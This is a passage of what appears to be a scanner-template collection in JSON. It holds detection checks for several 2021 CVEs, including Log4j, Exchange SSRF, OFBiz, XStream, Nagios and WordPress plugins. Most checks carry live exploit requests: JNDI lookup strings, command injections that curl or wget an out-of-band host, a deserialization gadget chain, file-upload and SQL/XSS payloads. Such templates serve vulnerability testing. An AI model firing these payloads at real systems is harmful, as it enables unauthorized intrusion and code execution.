application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30128","info":{"name":"Apache OFBiz <17.12.07 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ser=\"http://ofbiz.apache.org/service/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ser>\n        <map-Map>\n          <map-Entry>\n            <map-Key>\n              <cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</cus-obj>\n            </map-Key>\n          <map-Value>\n        <std-String/>\n        </map-Value>\n        </map-Entry>\n      </map-Map>\n      </ser>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["value=\"errorMessage\""]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-3374","info":{"name":"Rstudio Shiny Server <1.5.16 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2f/","{{BaseURL}}/sample-apps/hello/%2f/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /"]},{"type":"regex","part":"body","regex":["[A-Za-z].*\\.R"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37589","info":{"name":"Virtua Software Cobranca <12R - Blind SQL Injection","severity":"high"},"requests":[{"raw":["POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario='&idsenha=test&tipousr=Usuario\n","POST /controller/login.php?acao=autenticar HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nidusuario=''&idsenha=a&tipousr=Usuario\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3, \"Os parametros n\u00e3o est\u00e3o informados corretamente\")","contains(body_3, \"O CNPJ dos parametro n\u00e3o est\u00e1 informado corretamente\")"],"condition":"or"},{"type":"dsl","dsl":["status_code_2 == 500 && status_code_3 == 200"]}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo 'CVE-2021-24236'; ?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"word","part":"body_2","words":["CVE-2021-24236"]}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  